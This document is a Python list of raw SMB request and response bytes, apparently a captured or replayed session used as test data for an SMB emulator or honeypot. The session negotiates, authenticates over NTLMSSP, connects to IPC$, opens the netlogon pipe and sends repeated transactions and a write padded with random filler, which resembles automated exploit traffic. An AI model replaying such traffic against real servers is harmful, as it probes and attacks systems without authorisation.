stream = [('in', b'\x00\x00\x00T\xffSMBr\x00\x00\x00\x00\x18\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\xd1\x00\x00\x80I\x001\x00\x02LANMAN1.0\x00\x02LM1.2X002\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00'),
('out', b'\x00\x00\x00U\xffSMBr\x00\x00\x00\x00\x98\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x80I\x11\x03\x00\x03\x01\x00\x01\x00\x00\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\xfd\xe3\x00\x80\x90\xe1.\xe9\x9b\xbb\xd3\x01\xc4\xff\x00\x10\x00\x0b\xffe8T~lB\xa4>\x12\xd2\x11\x97\x16D'),
('in', b'\x00\x00\x00\x8f\xffSMBs\x00\x00\x00\x00\x18\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\xd1\x00\x00\x80I\x0c\xff\x00\x00\x00\x04\x11\x02\x00\x01\x00\x00\x00\x00\x001\x00\x00\x00\x00\x00\xd4\x00\x00\x80T\x00NTLMSSP\x00\x01\x00\x00\x00\x05\x02\x88\xa2\x01\x00\x01\x00 \x00\x00\x00\x10\x00\x10\x00!\x00\x00\x00.fP1sIUHEGeVKoWzCWindows 2000 2195\x00Windows 2000 5.0\x00'),
('out', b'\x00\x00\x00\x91\xffSMBs\x16\x00\x00\xc0\x98\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x80I\x04\xff\x00\x00\x00\x00\x008\x00f\x00NTLMSSP\x00\x02\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x05\x02\x88\xa2\xa4\xdf\xe8\x0b\xf5\xc6\x1e:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x05\x01(\x0a\x00\x00\x00\x0fWindows 5.1\x00Windows 2000 LAN Manager\x00WORKGROUP'),
('in', b'\x00\x00\x01\x08\xffSMBs\x00\x00\x00\x00\x18\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\xd1\x00\x00\x80I\x0c\xff\x00\x00\x00\x04\x11\x02\x00\x01\x00\x00\x00\x00\x00\xaa\x00\x00\x00\x00\x00\x5c\xd0\x00\x80\xcd\x00NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00@\x00\x00\x000\x000\x00X\x00\x00\x00\x02\x00\x02\x00\x88\x00\x00\x00\x00\x00\x00\x00\x8a\x00\x00\x00 \x00 \x00\x8a\x00\x00\x00\x00\x00\x00\x00\xaa\x00\x00\x00\x05\x02\x88\xa2em\xed\xcb,WU\x17\xc8\x19\xca\xdaUb\xacy\xfc|AD\xa3\xc9\xbb*D\xeb$\xc9w\xf3=\x09\x87\xd0\xc6\xfc\xcf\xaal\xcb\x01\x01\x00\x00\x00\x00\x00\x00\x80\x9a1^\xd1\xbd\xd3\x01\xfc|AD\xa3\xc9\xbb*\x00\x00\x00\x00\x00\x00\x00\x00.\x00f\x00P\x001\x00s\x00I\x00U\x00H\x00E\x00G\x00e\x00V\x00K\x00o\x00W\x00z\x00C\x00Windows 2000 2195\x00Windows 2000 5.0\x00'),
('out', b'\x00\x00\x00Y\xffSMBs\x00\x00\x00\x00\x98\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x80I\x04\xff\x00\x00\x00\x01\x00\x00\x00.\x00Windows 5.1\x00Windows 2000 LAN Manager\x00WORKGROUP'),
('in', b'\x00\x00\x00G\xffSMBu\x00\x00\x00\x00\x18\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\xd1\x00\x00\x80I\x04\xff\x00\x00\x00\x00\x00\x01\x00\x1c\x00\x00\x5c\x5c54.37.155.246\x5cIPC$\x00?????\x00'),
('out', b'\x00\x00\x00/\xffSMBu\x00\x00\x00\x00\x98\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x80I\x03\xff\x00.\x00\x01\x00\x06\x00x00\x27\x00\x00'),
('in', b'\x00\x00\x00\x5c\xffSMB\xa2\x00\x00\x00\x00\x18\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x80I\x18\xff\x00\x00\x00\x00\x08\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x09\x00netlogon\x00'),
('out', b'\x00\x00\x00\x87\xffSMB\xa2\x00\x00\x00\x00\x98\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x80I*\xff\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\xff\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9b\x01\x12\x00\x9b\x01\x12\x00\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x0d\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x0d\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x0e\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x0e\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x0f\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x0f\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x10\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x10\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x11\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x11\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x12\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x12\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x13\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x13\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x14\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x14\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x00@\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x00@\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x15\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x15\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x16\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x16\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x00D\xffSMB%\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x17\x1d\x0e\xfc\x00\xc0\x0e@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x04\x00@\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00'),
('out', b'\x00\x00\x008\xffSMB%\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x17\x1d\x0a\x00\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x01\x00\x00'),
('in', b'\x00\x00\x02<\xffSMB/\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x82\x1f\x0c\xff\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00x\x10\x00\x00\x00\x02<\x00\x01\x02\x00PNedxetrsPHPOiBpSBlbeOCRDIMkhqNVBIcsNusrlTEpsxcjAnHHHzhQRKkhWavGttgGgSokiHZpAtrlEAJfGvHqRAqbxUAavCLGrADgFVcmVufLQUOGJQGnNbQSXikHfHsMmSSQImcDZfRTQihDtZHIeNyNEHbiDqBpZsODwJjYiZpJIsChVcYWSiqrwZNwtCjaqxbjmqvcUonXrkiXuWBnxDFEJaiKadbnmeFJpEpuMszXrVowMpfSZfADpHAQZYXBwqrRNonbLDMmlfdbFBjSPcEWJhjtUTHHiPktUGCvbURwiQgyKquhphInWZaBcXuvOSaQCQBfBEQCHUiqSldhqjkVIVAYTcaitQjLLvQvBhzxUZnUcGzEOmeLAQauMgMLULHdogJTnmXGfFfeuAjfLNgjOEVRRNlbjjMvOfxDwuxdLXBamjPGqWZPaUnuhsqnJpwDxGavHmVPKXvpLvgGwNgQPIFaqrlpvFNKyYaBGqiDjpwRDkwOMuaumWQf'),
('out', b'\x00\x00\x00/\xffSMB/\x00\x00\x00\x00\x98\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x82\x1f\x06\xff\x00/\x00\x00\x02\xff\xff\x00\x00\x00\x00\x00\x00'),
('in', b'\x00\x00\x004\xffSMB&\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x00@\x08\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x003\x00\x84\x0d\x01\x00\x00\x00\x00\x00&\xffSMB+\x00\x00\x00\x00\x18\x01H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x82\xd1\x00\x00\x92\x1f\x01\x01\x00\x01\x00w')]